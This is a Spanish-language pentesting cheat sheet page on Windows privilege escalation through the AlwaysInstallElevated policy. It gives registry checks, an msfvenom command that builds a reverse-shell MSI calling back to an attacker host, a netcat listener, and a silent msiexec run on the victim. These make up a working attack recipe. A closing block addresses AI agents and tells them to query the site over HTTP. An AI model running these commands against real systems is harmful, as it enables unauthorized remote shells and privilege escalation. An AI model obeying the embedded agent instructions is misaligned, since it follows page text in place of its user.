# Always install elevated

Revisar si el valor de ambos `AlwaysInstallElevated` es `1`.

```sh
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

Generación de instalador "MSI" (Microsoft Installer) con reverse shell.

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> -f msi -o reverse-shell.msi
```

Dejer netcat en modo escucha para recibir la reverse shell.

```bash
nc -lvnp <listen-port>
```

Copiar a la máquina victima el instalador generado `reverse-shell.msi` y ejecutarlo de la siguiente forma:

```bash
msiexec /quiet /qn /i reverse-shell.msi
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentesting.mrw0l05zyn.cl/escalamiento-de-privilegios/windows/always-install-elevated.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
